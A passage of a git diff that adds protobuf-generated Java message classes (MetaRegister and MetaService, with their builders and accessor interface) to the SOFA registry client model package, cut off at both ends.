memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + if (!getApplicationBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 1, application_); + } + if (!getRevisionBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 2, revision_); + } + if (!getClientVersionBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 3, clientVersion_); + } + com.google.protobuf.GeneratedMessageV3.serializeStringMapTo( + output, internalGetBaseParams(), BaseParamsDefaultEntryHolder.defaultEntry, 4); + com.google.protobuf.GeneratedMessageV3.serializeStringMapTo( + output, internalGetServices(), ServicesDefaultEntryHolder.defaultEntry, 5); + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + if (!getApplicationBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, application_); + } + if (!getRevisionBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, revision_); + } + if (!getClientVersionBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, clientVersion_); + } + for (java.util.Map.Entry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + entry : internalGetBaseParams().getMap().entrySet()) { + com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + baseParams__ = + BaseParamsDefaultEntryHolder.defaultEntry + .newBuilderForType() + .setKey(entry.getKey()) + .setValue(entry.getValue()) + .build(); + size += com.google.protobuf.CodedOutputStream.computeMessageSize(4, baseParams__); + } + for (java.util.Map.Entry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + entry : internalGetServices().getMap().entrySet()) { + com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + services__ = + ServicesDefaultEntryHolder.defaultEntry + .newBuilderForType() + .setKey(entry.getKey()) + .setValue(entry.getValue()) + .build(); + size += com.google.protobuf.CodedOutputStream.computeMessageSize(5, services__); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.MetaRegister)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.MetaRegister other = + (com.alipay.sofa.registry.common.model.client.pb.MetaRegister) obj; + + boolean result = true; + result = result && getApplication().equals(other.getApplication()); + result = result && getRevision().equals(other.getRevision()); + result = result && getClientVersion().equals(other.getClientVersion()); + result = result && internalGetBaseParams().equals(other.internalGetBaseParams()); + result = result && internalGetServices().equals(other.internalGetServices()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + hash = (37 * hash) + APPLICATION_FIELD_NUMBER; + hash = (53 * hash) + getApplication().hashCode(); + hash = (37 * hash) + REVISION_FIELD_NUMBER; + hash = (53 * hash) + getRevision().hashCode(); + hash = (37 * hash) + CLIENTVERSION_FIELD_NUMBER; + hash = (53 * hash) + getClientVersion().hashCode(); + if (!internalGetBaseParams().getMap().isEmpty()) { + hash = (37 * hash) + BASEPARAMS_FIELD_NUMBER; + hash = (53 * hash) + internalGetBaseParams().hashCode(); + } + if (!internalGetServices().getMap().isEmpty()) { + hash = (37 * hash) + SERVICES_FIELD_NUMBER; + hash = (53 * hash) + internalGetServices().hashCode(); + } + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaRegister parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaRegister parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaRegister parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaRegister parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaRegister parseFrom(byte[] data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaRegister parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaRegister parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaRegister parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaRegister parseDelimitedFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaRegister parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaRegister parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaRegister parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.MetaRegister prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code MetaRegister} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:MetaRegister) + com.alipay.sofa.registry.common.model.client.pb.MetaRegisterOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaRegister_descriptor; + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMapField(int number) { + switch (number) { + case 4: + return internalGetBaseParams(); + case 5: + return internalGetServices(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMutableMapField(int number) { + switch (number) { + case 4: + return internalGetMutableBaseParams(); + case 5: + return internalGetMutableServices(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaRegister_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.MetaRegister.class, + com.alipay.sofa.registry.common.model.client.pb.MetaRegister.Builder.class); + } + + // Construct using com.alipay.sofa.registry.common.model.client.pb.MetaRegister.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + application_ = ""; + + revision_ = ""; + + clientVersion_ = ""; + + internalGetMutableBaseParams().clear(); + internalGetMutableServices().clear(); + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaRegister_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaRegister + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.MetaRegister.getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaRegister build() { + com.alipay.sofa.registry.common.model.client.pb.MetaRegister result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaRegister buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.MetaRegister result = + new com.alipay.sofa.registry.common.model.client.pb.MetaRegister(this); + int from_bitField0_ = bitField0_; + int to_bitField0_ = 0; + result.application_ = application_; + result.revision_ = revision_; + result.clientVersion_ = clientVersion_; + result.baseParams_ = internalGetBaseParams(); + result.baseParams_.makeImmutable(); + result.services_ = internalGetServices(); + result.services_.makeImmutable(); + result.bitField0_ = to_bitField0_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.MetaRegister) { + return mergeFrom((com.alipay.sofa.registry.common.model.client.pb.MetaRegister) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom(com.alipay.sofa.registry.common.model.client.pb.MetaRegister other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.MetaRegister.getDefaultInstance()) + return this; + if (!other.getApplication().isEmpty()) { + application_ = other.application_; + onChanged(); + } + if (!other.getRevision().isEmpty()) { + revision_ = other.revision_; + onChanged(); + } + if (!other.getClientVersion().isEmpty()) { + clientVersion_ = other.clientVersion_; + onChanged(); + } + internalGetMutableBaseParams().mergeFrom(other.internalGetBaseParams()); + internalGetMutableServices().mergeFrom(other.internalGetServices()); + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.MetaRegister parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.MetaRegister) e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private java.lang.Object application_ = ""; + /** string application = 1; */ + public java.lang.String getApplication() { + java.lang.Object ref = application_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + application_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string application = 1; */ + public com.google.protobuf.ByteString getApplicationBytes() { + java.lang.Object ref = application_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + application_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string application = 1; */ + public Builder setApplication(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + application_ = value; + onChanged(); + return this; + } + /** string application = 1; */ + public Builder clearApplication() { + + application_ = getDefaultInstance().getApplication(); + onChanged(); + return this; + } + /** string application = 1; */ + public Builder setApplicationBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + application_ = value; + onChanged(); + return this; + } + + private java.lang.Object revision_ = ""; + /** string revision = 2; */ + public java.lang.String getRevision() { + java.lang.Object ref = revision_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + revision_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string revision = 2; */ + public com.google.protobuf.ByteString getRevisionBytes() { + java.lang.Object ref = revision_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + revision_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string revision = 2; */ + public Builder setRevision(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + revision_ = value; + onChanged(); + return this; + } + /** string revision = 2; */ + public Builder clearRevision() { + + revision_ = getDefaultInstance().getRevision(); + onChanged(); + return this; + } + /** string revision = 2; */ + public Builder setRevisionBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + revision_ = value; + onChanged(); + return this; + } + + private java.lang.Object clientVersion_ = ""; + /** string clientVersion = 3; */ + public java.lang.String getClientVersion() { + java.lang.Object ref = clientVersion_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + clientVersion_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string clientVersion = 3; */ + public com.google.protobuf.ByteString getClientVersionBytes() { + java.lang.Object ref = clientVersion_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + clientVersion_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string clientVersion = 3; */ + public Builder setClientVersion(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + clientVersion_ = value; + onChanged(); + return this; + } + /** string clientVersion = 3; */ + public Builder clearClientVersion() { + + clientVersion_ = getDefaultInstance().getClientVersion(); + onChanged(); + return this; + } + /** string clientVersion = 3; */ + public Builder setClientVersionBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + clientVersion_ = value; + onChanged(); + return this; + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + baseParams_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + internalGetBaseParams() { + if (baseParams_ == null) { + return com.google.protobuf.MapField.emptyMapField( + BaseParamsDefaultEntryHolder.defaultEntry); + } + return baseParams_; + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + internalGetMutableBaseParams() { + onChanged(); + ; + if (baseParams_ == null) { + baseParams_ = + com.google.protobuf.MapField.newMapField(BaseParamsDefaultEntryHolder.defaultEntry); + } + if (!baseParams_.isMutable()) { + baseParams_ = baseParams_.copy(); + } + return baseParams_; + } + + public int getBaseParamsCount() { + return internalGetBaseParams().getMap().size(); + } + /** map<string, .StringList> baseParams = 4; */ + public boolean containsBaseParams(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetBaseParams().getMap().containsKey(key); + } + /** Use {@link #getBaseParamsMap()} instead. */ + @java.lang.Deprecated + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + getBaseParams() { + return getBaseParamsMap(); + } + /** map<string, .StringList> baseParams = 4; */ + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + getBaseParamsMap() { + return internalGetBaseParams().getMap(); + } + /** map<string, .StringList> baseParams = 4; */ + public com.alipay.sofa.registry.common.model.client.pb.StringList getBaseParamsOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.StringList defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetBaseParams().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, .StringList> baseParams = 4; */ + public com.alipay.sofa.registry.common.model.client.pb.StringList getBaseParamsOrThrow( + java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetBaseParams().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + public Builder clearBaseParams() { + internalGetMutableBaseParams().getMutableMap().clear(); + return this; + } + /** map<string, .StringList> baseParams = 4; */ + public Builder removeBaseParams(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableBaseParams().getMutableMap().remove(key); + return this; + } + /** Use alternate mutation accessors instead. */ + @java.lang.Deprecated + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + getMutableBaseParams() { + return internalGetMutableBaseParams().getMutableMap(); + } + /** map<string, .StringList> baseParams = 4; */ + public Builder putBaseParams( + java.lang.String key, com.alipay.sofa.registry.common.model.client.pb.StringList value) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + if (value == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableBaseParams().getMutableMap().put(key, value); + return this; + } + /** map<string, .StringList> baseParams = 4; */ + public Builder putAllBaseParams( + java.util.Map + values) { + internalGetMutableBaseParams().getMutableMap().putAll(values); + return this; + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + services_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + internalGetServices() { + if (services_ == null) { + return com.google.protobuf.MapField.emptyMapField(ServicesDefaultEntryHolder.defaultEntry); + } + return services_; + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + internalGetMutableServices() { + onChanged(); + ; + if (services_ == null) { + services_ = + com.google.protobuf.MapField.newMapField(ServicesDefaultEntryHolder.defaultEntry); + } + if (!services_.isMutable()) { + services_ = services_.copy(); + } + return services_; + } + + public int getServicesCount() { + return internalGetServices().getMap().size(); + } + /** map<string, .MetaService> services = 5; */ + public boolean containsServices(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetServices().getMap().containsKey(key); + } + /** Use {@link #getServicesMap()} instead. */ + @java.lang.Deprecated + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + getServices() { + return getServicesMap(); + } + /** map<string, .MetaService> services = 5; */ + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + getServicesMap() { + return internalGetServices().getMap(); + } + /** map<string, .MetaService> services = 5; */ + public com.alipay.sofa.registry.common.model.client.pb.MetaService getServicesOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.MetaService defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetServices().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, .MetaService> services = 5; */ + public com.alipay.sofa.registry.common.model.client.pb.MetaService getServicesOrThrow( + java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetServices().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + public Builder clearServices() { + internalGetMutableServices().getMutableMap().clear(); + return this; + } + /** map<string, .MetaService> services = 5; */ + public Builder removeServices(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableServices().getMutableMap().remove(key); + return this; + } + /** Use alternate mutation accessors instead. */ + @java.lang.Deprecated + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaService> + getMutableServices() { + return internalGetMutableServices().getMutableMap(); + } + /** map<string, .MetaService> services = 5; */ + public Builder putServices( + java.lang.String key, com.alipay.sofa.registry.common.model.client.pb.MetaService value) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + if (value == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableServices().getMutableMap().put(key, value); + return this; + } + /** map<string, .MetaService> services = 5; */ + public Builder putAllServices( + java.util.Map + values) { + internalGetMutableServices().getMutableMap().putAll(values); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:MetaRegister) + } + + // @@protoc_insertion_point(class_scope:MetaRegister) + private static final com.alipay.sofa.registry.common.model.client.pb.MetaRegister + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.MetaRegister(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaRegister getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public MetaRegister parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new MetaRegister(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaRegister getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaRegisterOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaRegisterOrBuilder.java new file mode 100644 index 000000000..10afc47f6 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaRegisterOrBuilder.java @@ -0,0 +1,76 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface MetaRegisterOrBuilder + extends + // @@protoc_insertion_point(interface_extends:MetaRegister) + com.google.protobuf.MessageOrBuilder { + + /** string application = 1; */ + java.lang.String getApplication(); + /** string application = 1; */ + com.google.protobuf.ByteString getApplicationBytes(); + + /** string revision = 2; */ + java.lang.String getRevision(); + /** string revision = 2; */ + com.google.protobuf.ByteString getRevisionBytes(); + + /** string clientVersion = 3; */ + java.lang.String getClientVersion(); + /** string clientVersion = 3; */ + com.google.protobuf.ByteString getClientVersionBytes(); + + /** map<string, .StringList> baseParams = 4; */ + int getBaseParamsCount(); + /** map<string, .StringList> baseParams = 4; */ + boolean containsBaseParams(java.lang.String key); + /** Use {@link #getBaseParamsMap()} instead. */ + @java.lang.Deprecated + java.util.Map + getBaseParams(); + /** map<string, .StringList> baseParams = 4; */ + java.util.Map + getBaseParamsMap(); + /** map<string, .StringList> baseParams = 4; */ + com.alipay.sofa.registry.common.model.client.pb.StringList getBaseParamsOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.StringList defaultValue); + /** map<string, .StringList> baseParams = 4; */ + com.alipay.sofa.registry.common.model.client.pb.StringList getBaseParamsOrThrow( + java.lang.String key); + + /** map<string, .MetaService> services = 5; */ + int getServicesCount(); + /** map<string, .MetaService> services = 5; */ + boolean containsServices(java.lang.String key); + /** Use {@link #getServicesMap()} instead. */ + @java.lang.Deprecated + java.util.Map + getServices(); + /** map<string, .MetaService> services = 5; */ + java.util.Map + getServicesMap(); + /** map<string, .MetaService> services = 5; */ + com.alipay.sofa.registry.common.model.client.pb.MetaService getServicesOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.MetaService defaultValue); + /** map<string, .MetaService> services = 5; */ + com.alipay.sofa.registry.common.model.client.pb.MetaService getServicesOrThrow( + java.lang.String key); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaService.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaService.java new file mode 100644 index 000000000..ff35c8d87 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaService.java @@ -0,0 +1,783 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code MetaService} */ +public final class MetaService extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:MetaService) + MetaServiceOrBuilder { + private static final long serialVersionUID = 0L; + // Use MetaService.newBuilder() to construct. + private MetaService(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private MetaService() { + id_ = ""; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private MetaService( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + java.lang.String s = input.readStringRequireUtf8(); + + id_ = s; + break; + } + case 26: + { + if (!((mutable_bitField0_ & 0x00000002) == 0x00000002)) { + params_ = + com.google.protobuf.MapField.newMapField(ParamsDefaultEntryHolder.defaultEntry); + mutable_bitField0_ |= 0x00000002; + } + com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + params__ = + input.readMessage( + ParamsDefaultEntryHolder.defaultEntry.getParserForType(), + extensionRegistry); + params_.getMutableMap().put(params__.getKey(), params__.getValue()); + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaService_descriptor; + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMapField(int number) { + switch (number) { + case 3: + return internalGetParams(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaService_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.MetaService.class, + com.alipay.sofa.registry.common.model.client.pb.MetaService.Builder.class); + } + + private int bitField0_; + public static final int ID_FIELD_NUMBER = 1; + private volatile java.lang.Object id_; + /** string id = 1; */ + public java.lang.String getId() { + java.lang.Object ref = id_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = 